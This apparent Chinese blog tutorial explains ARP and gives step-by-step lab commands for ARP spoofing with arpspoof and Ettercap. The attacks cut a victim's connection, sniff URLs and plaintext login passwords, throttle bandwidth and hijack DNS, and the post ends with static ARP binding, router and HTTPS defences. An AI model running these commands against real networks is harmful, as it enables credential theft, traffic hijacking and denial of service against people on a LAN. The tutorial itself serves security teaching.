ARP渗透与防御


IP签名

一. ARP协议

1. ARP协议工作原理

什么是ARP

地址解析协议,即ARP(Address Resolution Protocol),是根据IP地址获取物理地址的一个TCP/IP协议

工作原理

ARP协议规定,每台计算机都需要一个ARP表,用来保存IP地址和MAC地址的映射关系,访问IP地址的时候就去查看ARP表,从而找到对应的MAC地址

如果ARP表中匹配不到,就会使用广播的方式发送一个ARP请求,目标主机收到请求后会使用单播的方式返回一个ARP相应,告知自己的MAC地址

拿到MAC地址后,会将映射关系缓存到ARP表,而后传递到数据链路层进行解析转换

2. ARP协议的作用

网路中的数据传输所依赖的是MAC地址而不是IP地址,ARP协议负责将IP协议转换为MAC地址

ARP协议的主要工作就是建立,查询,更新,删除ARP表项

3. ARP常用命令

  1. 查询arp表:

    arp -a

image-20221030141341964

  1. 删除表内某个IP

    arp -d IP
  2. tcp抓某块网卡的所有arp请求

    tcpdump -i eth0 -nn arp
  3. tcp抓取指定ip的请求

    tcpdump -i eth0 -nn arp and host IP

4. ARP工作过程演示

在centos7上通过抓包来了解arp的工作过程

  1. 首先查看一下该机器有没有ip:192.168.110.13的mac地址

    arp -a
    如果存在则先删除掉
    arp -d IP 
  2. 在centos7 上抓包

    tcpdump -i eth0 -nn arp 或者 tcpdump -i eth0 -nn arp and host 192.168.110.13
  3. ping一下该IP

    ping 192.168.110.13
  4. 查看抓包结果

    14:25:52.276016 ARP, Request who-has 192.168.25.150 tell 192.168.25.138, length 28
    # 请问谁是192.168.25.150 ,请你将你的mac地址告诉给192.168.25.138
    14:25:52.276833 ARP, Reply 192.168.25.150 is-at 00:0c:29:8f:60:5a, length 46
    # 我是192.168.25.150 ,我的mac地址是 00:0c:29:8f:60:5a
    
    14:25:52.358384 ARP, Request who-has 192.168.25.138 tell 192.168.25.150, length 46
    14:25:52.358412 ARP, Reply 192.168.25.138 is-at 00:0c:29:3e:4f:f2, length 28
  5. 查看最新的ARP表,看看是否绑定了mac地址

    arp -a
    ? (192.168.25.150) at 00:0c:29:8f:60:5a [ether] on ens33
  6. ARP的请求时一直不间断的在自动发送的,一台计算机会通信进行一下过程

    1. 主动询问网段下的IP的MAC地址
    2. 主动告诉别人我的IP和MAC地址
    3. 根据应答结果实时更新ARP表的绑定关系

5. 总结

  1. ARP协议负责将IP地址转换为MAC地址,或者说ARP协议负责将IP地址和MAC地址进行绑定
  2. ARP协议的主要工作就是建立,查询,更新,删除ARP表项
  3. ARP的特性:无序认为干预,一直在进行轮询和应答

二. ARP断网攻击

ARP断网攻击

1.课前准备

kali 作为ARP攻击机,192.168.110.26 MAC地址:00:0c:29:fc:66:46

win10 作为被攻击方,192.168.110.12 MAC地址:1c:69:7a:a4:cf:92

网关(路由器),192.168.110.1 MAC地址:e4:3a:6e:35:98:00

需要注意的时,两台主机需要在同一个局域网,并且网络通畅。

ping www.mashibing.com

计算上网的过程示意图:

计算机上网示意图

2.arp断网攻击原理

他的原理是:向目标主机不断的发送ARP报文,然后将其报文中的网关Mac地址设置成为攻击机的主机MAC地址,
然后目标主机想要访问网络发送数据包时,都会发送到攻击机,然后攻击机只需要做一个丢弃数据包的
命令,就可以断掉目标主机的网络了。

3.arpspoof介绍:

arpspoof [spuːf] 是一个好用的ARP欺骗工具,攻击者通过毒化受害者ARP缓存,将网关MAC替换为攻击者MAC,然后攻击者可截获受害者发送和收到的数据包,从而获取受害者账户、密码等相关敏感信息。Kali linux中自带了该工具。

命令使用讲解

arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
-i:指定网卡
-c:攻击机的IP
-t 目标机器的IP
-r:网关IP

4.具体攻击步骤:

1.首先确保两台机器在同一局域网络下,并且可以互相通讯。

​ 1.1查看kali的ip:

ip a

​ 1.2 查看windows的ip:

ipconfig /all

​ 1.3 windows ping kali:

ping 192.168.110.26

​ 1.4 win10 查看arp表,记录网关的信息

arp -a |findstr 192.168.110.1

2.kali进行断网攻击

arpspoof -i eth0 -r 192.168.110.1 -t 192.168.110.12
-i:指定网卡
-r:指定网关ip
-t:指定靶机ip

3.win10 查看网络连接 和 kali 的网络链接

ping www.mashibing.com

4.win10查看此时的arp表

arp -a 
或者
arp -a |findstr 192.168.110.1

5.结束断网攻击

ctrl+C

6.win10重新查看网络状态

ping www.mashibing.com

7.win10重新查看arp表

arp -a |findstr 192.168.110.1

5.ARP断网攻击原理深入分析

**1.ARP攻击断网的过程 **

0:c:29:fc:66:46 1c:69:7a:a4:cf:92 0806 42: arp reply 192.168.110.1 is-at 0:c:29:fc:66:46
0:c:29:fc:66:46 e4:3a:6e:35:98:0 0806 42: arp reply 192.168.110.12 is-at 0:c:29:fc:66:46
ARP攻击机器 不停的在告诉 192.168.110.1(网关)  192.168.110.12 的mac地址是 00:0c:29:fc:66:46
ARP攻击机器 不停的在告诉 192.168.110.12(靶机) 192.168.110.1 的mac地址是 00:0c:29:fc:66:46

Ctrl+C停止攻击后
0:c:29:fc:66:46 1c:69:7a:a4:cf:92 0806 42: arp reply 192.168.110.1 is-at e4:3a:6e:35:98:0
0:c:29:fc:66:46 e4:3a:6e:35:98:0 0806 42: arp reply 192.168.110.12 is-at 1c:69:7a:a4:cf:92
ARP攻击机器 重新告诉 192.168.110.12(靶机) 192.168.110.1 的mac地址是 e4:3a:6e:35:98:0
ARP攻击机器 重新告诉 192.168.110.1(网关)  192.168.110.12 的mac地址是 1c:69:7a:a4:cf:92

2.ARP断网原理图:

image-20221030143543185

三. ARP 攻击-流量分析

中心主题

1. kali数据包转发

出于安全考虑,Linux系统默认是进制数据包转发的,所谓转发即当主机拥有多余一块网卡时,其中一块收到数据包,根据数据包的目的ip地址将数据包发往本机另一块网卡,该网卡根据路由表继续发送数据包.这通常是路由器所要实现的功能,我们需要手动开启转发功能

  1. 如何开启通信转发

    kali里有个ip_forward配置文件

    1. 默认是0 禁止端口转发
    2. 将其设置成1 开启端口转发
  2. 开启步骤

    1. 查看当前是否开启了端口转发

      cat /proc/sys/net/ipv4/ip_forward
    2. 开启通信转发的命令

      echo 1 >> /proc/sys/net/ipv4/ip_forward
    3. 使用arpspoof发起ARP攻击

      arpspoof -i eth0 -r 192.168.25.1 -t 192.168.25.138
    4. 验证是否转发成功

      访问https://www.baidu.com

2. dsniff工具

  1. 工具介绍

​ dsniff是一个基于Unix系统网络嗅探工具,工具集包含两个我们需要的两个工具包,arpspoof和urlsnarf

  1. 安装方法

    apt-get install dsniff
  2. urlsnarf工具介绍

    urlsnarf -h 
    urlsnarf [-n] [-i interface | -p pcapfile] [[-v] pattern [expression]]
    
    -n 表示不反查主机名
    -i interface 网卡接口名
    -p pattern 表示对过滤的内容使用的正则表达式
    -v表示取相反,即是不匹配;expression 是过滤语法,和tcpdump的相同,请参考tcpdump。

3. url流量分析

  1. 概念

    URL流量嗅探操作非常类似于中间人攻击,通过目标主机将路由流量注入到因特网,该过程将通过arp注入实现攻击,url嗅探能够实时跟踪电脑中的数据流量信息,并分析出它的类型和去向,从而获得你的上网信息

  2. 流量攻击

    1. 开启流量转发

      echo 1 >> /proc/sys/net/ipv4/ip_forward
    2. 开启ARP攻击

      arpspoof -i eth0 -r 192.168.25.1 -t 192.168.25.138
    3. 捕获目标计算机的url

      urlsnarf -i eth0
    4. 靶机上网,访问网站

      1. http://www.kangda.cn/#/user/login?redirect=http%3A%2F%2Fwww.kangda.cn%2F%23%2F
      2. http://blog.tianya.cn/
    5. kali分析用户请求

      image-20221030155041042

四. ARP-WireShark截获用户数据

ARP-WireShark截获用户信息

1. WireShark工具介绍

wireshark的官方下载网站: http://www.wireshark.org/

wireshark是非常流行的网络封包分析软件,功能十分强大。可以截取各种网络封包,显示网络封包的详细信息。

wireshark是开源软件,可以放心使用。 可以运行在Windows,linux和Mac OS上。

2. ARP攻击截获密码的步骤

1.开启数据包转发

echo 1 >> /proc/sys/net/ipv4/ip_forward

2.开启ARP攻击

arpspoof -i eth0 -r 192.168.25.1 -t 192.168.25.136

3.启动wireshark

wireshark

4.输入过滤条件

(ip.src==192.168.25.150 or ip.dst==192.168.25.136) and tcp.port==80 and http

5.靶机登录后台系统

http://mng.517628.com/login.php
http://vmims.eguagua.cn/#/Login

6.wireshark寻找用户的登录信息

五. ARP-Ettercap劫持用户流量

ARP-Ettercap劫持用户流量

一.ettercap 工具介绍

项目官网:http://ettercap.github.io/ettercap/index.html

EtterCap是一个基于ARP地址欺骗方式的网络嗅探工具,主要适用于交换局域网络。借助于EtterCap嗅探软件,渗透测试人员可以检测网络内明文数据通讯的安全性,及时采取措施,避免敏感的用户名/密码等数据以明文的方式进行传输。

ettercap几乎是每个渗透测试人员必备的工具之一。

二.ARP截获用户信息攻击步骤

1.启动ettercap

ettercap -G

2.点击右上角的对勾开始扫描

开启扫描

3.点击左上角查看主机列表

查看主机列表

4.选择网关 点击底部的 Add to Target 1

将网关加入目标1

5.选择攻击靶机加入到target2

将靶机加入到目标2

6.点击右上角攻击菜单,选择ARP攻击

选择ARP攻击

7.点击ok发起攻击

点击ok发起攻击

8.查看此时靶机的arp列表

arp -a|findstr 192.168.110.1

9.查看kali的mac地址

ip a

10.靶机登录网站

http://www.kangda.cn/#/user/login?redirect=http%3A%2F%2Fwww.kangda.cn%2F%23%2F
http://vmims.eguagua.cn/#/Login

11.截获用户流量,获取账号密码

截获用户流量信息

12.停止攻击

停止攻击

三.Ettercap 软件功能介绍

1.启动界面

界面1

Sniffing at startup :开启嗅探模式

Primary interface :选择网卡

Bridged sniffing :是否开启桥接模式

Bridged interface :桥接模式下的网卡

配置完成后,我们点上方的✔即可完成配置。

界面2

2.中间人攻击菜单

界面3

ARP poisoning :ARP攻击

DNP poisoning :DNP攻击

ICMP redirect :icmp重定向

Port stealing :端口欺骗

DHCP spoofing :DHCP欺骗

stop MITM :停止攻击

SSL intercept :ssl嗅探

3.更多选项

界面4

Targets:攻击列表

Hosts:显示主机列表

Filters:载入二进制脚本

Plugins:插件

Logging:日志

4.hosts选项

界面5

Hosts list:扫描到的主机列表

Enable ipv6 scan:扫描ipv6地址

Scan for hosts:扫描主机列表

load hosts form file:从外部文件载入主机列表

Save hosts to file:保存主机列表到文件

5.Targets选项

界面6

Current targets:正在攻击的列表

Select targets::选择攻击列表

Portocol:攻击协议

Reverse matching:匹配规则

Wipe targets:擦除攻击

6.View选项

界面7

Connections:连接信息

Profiles:IP地址信息

Statistics:统计信息

四.命令行运行Ettercap

1.运行命令讲解

ettercap –i –eth0 –Tq –M arp:remote/ip(host)//net gatemask/ >>b.txt
T:指的是text文本模式
q:指的是安静模式执行这个命令
i:后面跟的是连接局域网的网卡
M:后面跟的是指定使用arp的方式
>>:输出文件

2.攻击命令

ettercap -T -i eth0  -M arp:remote /192.168.110.1// /192.168.110.11// 
ettercap -Tq -l a.log -i eth0  -M arp:remote /192.168.110.1// /192.168.110.11// 

ettercap -Tq -i eth0  -M arp:remote /192.168.110.1// /192.168.110.11// >>b.txt

3.靶机登录后台网站

http://www.kangda.cn/#/user/login?redirect=http%3A%2F%2Fwww.kangda.cn%2F%23%2F
http://vmims.eguagua.cn/#/Login

4.查看攻击界面日志

tail -f b.txt

停止查看:
CTRL+C

5.过滤无用信息,只查看用户的登录信息

tail -f b.txt | grep "USER" 
或者
tail -f b.txt | grep "CONTENT" 
或者
tail -f b.txt | egrep "USER|CONTENT"

6.停止ARP攻击

CTRL+C

7.分析日志

cat b.txt

8.筛选用户的登录信息

cat b.txt | grep "USER" 
或者
cat b.txt | grep "CONTENT" 
或者
cat b.txt | egrep "USER|CONTENT"

9.收集保存用户信息文件

cat -n  b.txt | egrep "USER|CONTENT" >arp.log
-n:添加行号
egrep:过滤规则
>:输出文件

六. ARP限制网速攻击

ARP限制网速攻击

当kali欺骗了网关和受害者的时候,受害者访问网络就需要经过kali的网卡,那我们限制kali网卡的速度或者转发的速度就可以限制对方的网速。这里可以使用的工具有tc、iptables、WonderShaper等等,我们以tc为例,tc是通过限制网卡的速度来限制对方的,是一种杀敌一千自损八百的手段。

1. TC工具介绍

在Linux中,流量控制都是通过TC这个工具来完成的,通常,要对网卡进行流量控制的配置,需要进行如下的步骤:

  1. 为网卡配置一个队列
  2. 在该队列上简历分类
  3. 根据需要建立子队列和子分类
  4. 为每个分类建立过滤器

需要注意的是,在TC中使用下列的缩写表示相应的网络延迟

时间的计量单位:

s,sec或者secs–>秒

ms,msec或者msecs–>毫秒

us,usec,usecs或者一个无单位数字–>微秒

QDisc(排队规则) [qdɪsk]是queueing discipline [ˈkjuːɪŋ] [ˈdɪsəplɪn] 的简写,它是理解流量控制(traffic control)的基础。无论何时,内核如果需要通过某个网络接口发送数据包,它都需要按照为这个接口配置的qdisc(排队规则)把数据包加入队列。然后,内核会尽可能多地从qdisc里面取出数据包,把它们交给网络适配器驱动模块。

2. TC命令介绍

  1. 限制网速200ms延时

    tc qdisc add dev eth0 root netem delay 200ms
    参数:
    qdisc: 排队规则
    add: 添加
    dev: 设备(网卡)
    root: root用户身份
    netem delay: 设置网络延迟时间
  2. 取消限制网速200ms延时

    tc qdisc del dev eth0 root netem delay 200ms
    参数:
    qdisc:排队规则
    del:删除
    dev:设备(网卡)
    root:root用户身份
    netem delay:设置网络延时时间
  3. 修改网络延时

    tc qdisc change  dev eth0 root netem delay 300ms
    参数:
    qdisc:排队规则
    change:修改
    dev:设备(网卡)
    root:root用户身份
    netem delay:设置网络延时时间

3. ARP攻击限制网速的具体步骤

  1. 开启端口转发

    cat /proc/sys/net/ipv4/ip_forward		-->#值为0表示没开启流量转发,为1表示开启了
    echo 1 > /proc/sys/net/ipv4/ip_foorward		-->#开启流量转发
  2. 开启ARP攻击

    arpspoof -i eth0 -r 192.168.25.1 -t 192.168.25.51
  3. 查看靶机当前网速

    https://www.speedtest.cn/
  4. 开启网络延迟限速

    tc qdisc add dev eth0 root netem delay 500ms
  5. 查看限速规则

    tc qdisc change dev eth0 root netem delay 800ms
  6. 查看靶机当前的网速

    https://www.speedtest.cn/
  7. 修改网速限制

    tc qdisc change dev eth0 root netem delay 800ms
  8. 查看限速规则

    tc qdisc show
  9. 查看靶机当前的网速

    https://www.speedtest.cn/
  10. 取消限速

    tc qdisc del dev eth0 root netem delay 800ms
  11. 查看限速规则

    tc qdisc show
  12. 查看靶机网速

    https://www.speedtest.cn/

4. 限速原理图

image-20221103090505222

七. ARP-Ettercap DNS劫持

![ARP-Ettercap DNS劫持](https://images.zezhao.wang/images/note/arp/ARP-Ettercap DNS劫持.png)

1. 什么是DNS

DNS是Domain Name System的缩写,我们称之为域名系统,首先它是远程调用服务,本地默认占用53端口,它本身的实质上一个域名和ip的数据库服务器,他要完成的任务是帮我们把输入的域名转换成ip地址,之后通过ip寻址连接目标服务器

2. 工作过程

当访问一个网站时系统将从DNS缓存中读取该域名所对应的IP地址,当查找不到时就会到系统中查找hosts文件,如果还没有才会向DNS服务器请求一个DNS查询,DNS服务器将返回该域名所对应的IP,在你的系统收到解析地址以后将使用该IP地址进行访问,同时将解析缓存到本地的DNS缓存中

image-20221103091740489

2. 什么是DNS劫持

  1. 概念

DNS劫持又称域名劫持,是指在劫持的网络范围内拦截域名解析的请求,分析请求的域名,把审查范围以外的请求放行,否则返回假的IP地址或者什么都不做使请求失去响应,其效果就是对特定的网络不能访问或访问的是假网址。

  1. ettercap劫持的原理

局域网劫持,攻击者通过伪装成网关,劫持受害者的网络请求,将网络请求拦截到指定的服务器

  1. DNS常用命令讲解

    1. 查看DNS缓存表

      ipconfig /displaydns
    2. 获取DNS地址

      ping www.baidu.com
    3. 刷新DNS缓存

      ipconfig /flushdns

3. ARP-DNS欺骗攻击步骤

  1. kali开启Apache服务

    service apache2 start
  2. 浏览器访问Apache首页

    http://192.168.25.150
  3. 编辑ettercap配置文件

    1. 进入配置文件位置

      cd /etc/ettercap
    2. 备份原有的配置文件

      cp etter.dns etter.dns1
    3. 设置dns劫持配置文件

      vi /etc/ettercap/etter.dns
      添加以下内容
      *   A   192.168.110.12
      *   PTR 192.168.110.12
      wq保存
      参数
      *:代表所有的网站 也可设置某个网站 www.baidu.com
      A:代表钓鱼的ip地址
      PTR :常被用于反向地址解析

      image-20221103094757150

  4. ettercap劫持命令讲解

    ettercap -i eth0 -Tq -M arp:remote -P dns_spoof /被攻击者ip// /被攻击者网关//
    -i: 网卡
    -T: 文本模式
    -q: 安静模式
    -M: 执行mitm攻击
    -P: plugin开始该插件
  5. 靶机访问以下网站确认环境正常

    http://www.baidu.com
    http://www.jd.com
  6. 执行劫持命令

    ettercap -i eth0 -Tq -M arp:remote -P dns_spoof /192.168.25.151// /192.168.25.1// >b.txt
  7. 分析日志

    tail -f b.txt
    或者
    tail -f b.txt | grep "dns_spoof"
  8. 靶机访问网站查看攻击效果

  9. 停止劫持

    Ctrl+C
  10. 恢复dns劫持,刷新dns缓存即可

    ipconfig /flushdns
  11. 靶机访问网站查看环境是否恢复正常

  12. 恢复kali环境

    1. 进入配置文件位置

      cd /etc/ettercap
    2. 复制dns文件到新文件

      cp etter.dns etter.dns2
    3. 还原dns配置文件

      cp etter.dns1 etter.dns

八. ARP攻击防御

1.ARP防御方法简介

ARP攻击的原理是向网关和靶机不停的发送ARP欺骗报文,我们的计算机或者网关就会实时更新ARP缓存表,从而出现安全漏洞。假如对这种欺骗报文的处理是不相信或者不接受的话,就不会出现问题了。处理这种的欺骗的行为我们没办法提前在攻击端进行操作,因为敌人躲在暗处,而我们处明处。

针对这种情况我们可以从以下两方面入手:

1.让我们的电脑不接收欺骗包

2.即使接收到欺骗的包也不要相信

目前网络安全行业现有的ARP防御方案,基本都是基于上面两个方法实现的。

2.windows防御

1.安装arp的防火墙

安装360安全卫士 地址:https://www.360.cn/

2.选择网络安全

360选择网络安全

3.选择流量防火墙

360选择流量防火墙

4.选择局域网防护开启防火墙

360开启局域网防护

5.开启ARP攻击

arpspoof -i eth0 -r 192.168.110.1 -t 192.168.110.24

6.查看防护效果

360查看防护效果

7.查询本地arp表

arp -a

8.关闭防火墙(退出360安全卫士)

9.查看当前arp表

arp -a

10.停止攻击

ctrl+c

2.设置静态mac地址

1.临时绑定,重启后失去保护效果

1.ARP表MAC地址绑定状态

ARP表MAC地址绑定类型有动态和静态两种。

动态:有时效限制,会实时更新,不安全

静态:长久生效,不会随时间或者通知而变化,安全。

我们来看一下电脑上的ARP表。

arp -a

大部分都是动态的,动态的MAC地址他有生命周期,一定时间之后就会被替换,另外别人通知我更新的时候,也会被直接替换,也就是说无论是被动获取时发现变化了,还是主动被告知时已经变动了,arp列表都会进行更新。如果是攻击方告诉了靶机,他也会相信,从而导致被攻击。我们解决的方法就是把动态的MAC地址变成静态的。那么该如何绑定呢?

2.绑定步骤

1.Win10以管理员身份运行CMD命令提示符

2.查询网关的ip和mac地址

arp -a |findstr 192.168.110.1
网关的IP:192.168.110.1
网关的MAC地址:e4-3a-6e-35-98-00

3.查询本机的网卡

ipconfig

查看本机网卡

4.查询本地连接的网卡ID号

netsh i i show in

#netsh i i show in  是netsh  interface ipv4 show interfaces 的缩写

从图中可以找到,Idx就是网卡的ID,以 Ethernet0也就是我本机的网卡,id=6

查询网卡id

5.临时绑定mac地址,重启失效

netsh -c i i add neighbors  6 192.168.110.1 e4-3a-6e-35-98-00 store=active

-c Context 指定上下文
i: interface 更改到 `netsh interface' 上下文。
i:ipv4
add: 在项目列表上添加一个配置项目
neighbors: 添加邻居地址
store=active:设置为临时绑定
查询帮助命令:netsh -c /?

临时改变成静态

6.发起ARP攻击

arpspoof -i eth0 -r 192.168.110.1 -t 192.168.110.24

7.查询靶机ARP表

arp -a

8.停止ARP攻击

ctrl+c

9.重启靶机,查看arp表

arp -a

10.重新发起ARP攻击

arpspoof -i eth0 -r 192.168.110.1 -t 192.168.110.12

11.查看靶机arp

arp -a

12.停止攻击

ctrl+c

2.永久绑定,重启后不失效

1.绑定命令

netsh -c i i add neighbors  6 192.168.110.1 e4-3a-6e-35-98-00 store=persistent
store=persistent:永久绑定

2.查看ARP表

arp -a

3.发起ARP攻击

arpspoof -i eth0 -r 192.168.110.1 -t 192.168.110.24

4.查看arp缓存表

arp -a

5.重启电脑,查看ARP表

arp -a

6.删除静态配置

arp -d ip #不推荐使用,下次设置时,出现错误
netsh -c i i delete ne 6  #推荐使用

7.查看靶机arp表

arp -a

8.停止攻击

ctrl+c

3.linux防御

1.查询arp表命令

arp -a
ip n 
ip neigh
 
192.168.110.1 dev ens33 lladdr e4:3a:6e:35:98:00 STALE #不新鲜的
192.168.110.1 dev ens33 lladdr e4:3a:6e:35:98:00 REACHABLE #可到达的

2.临时添加静态地址,重启后失效

arp -s 192.168.110.1 e4:3a:6e:35:98:00

3.查询arp表

ip n
192.168.110.1 dev ens33 lladdr e4:3a:6e:35:98:00 PERMANENT #永久的

4.发起ARP攻击

ettercap -T -i eth0  -M arp:remote /192.168.110.1// /192.168.110.26// 

5.查看靶机arp表

ip n 

6.重启靶机

reboot

7.查看靶机arp表

ip n

8.将其添加到 rc.local里边 开启自动执行

vi  /etc/rc.local
chmod +x /etc/rc.d/rc.local
添加:
arp -s 192.168.110.1 e4:3a:6e:35:98:00
wq保存

9.重启centos7

reboot

10.查看arp表

ip n

4.路由/网关防护设置

1.打开路由器配置网站

​ 一般是http://网关ip

2.点击更多功能

路由器-更多功能

3.选择网络设置–局域网

路由-网络设置

4.添加静态ip地址绑定列表

路由器-添加静态ip地址绑定

5.手动添加绑定

路由手动配置mac地址

5.WEB服务防御ARP攻击

web服务防御明文传输泄露用户信息的手段:使用加密协议:https

1.什么是HTTP

超文本传输协议,是一个基于请求与响应,无状态的,应用层的协议,常基于TCP/IP协议传输数据,互联网上应用最为广泛的一种网络协议,所有的WWW文件都必须遵守这个标准。设计HTTP的初衷是为了提供一种发布和接收HTML页面的方法。使用明文传输,容易被劫持。

2.什么是HTTPS

《图解HTTP》这本书中曾提过HTTPS是身披SSL外壳的HTTP。HTTPS是一种通过计算机网络进行安全通信的传输协议,经由HTTP进行通信,利用SSL/TLS建立全信道,加密数据包。HTTPS使用的主要目的是提供对网站服务器的身份认证,同时保护交换数据的隐私与完整性。使用加密传输,不容易被拦截,更加安全。

TLS是传输层加密协议,前身是SSL协议,由网景公司1995年发布,有时候两者不区分。

3.HTTPS加密通讯工作原理

HTTPS工作原理


文章作者: 吗喽の小屋
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 吗喽の小屋 !
  目录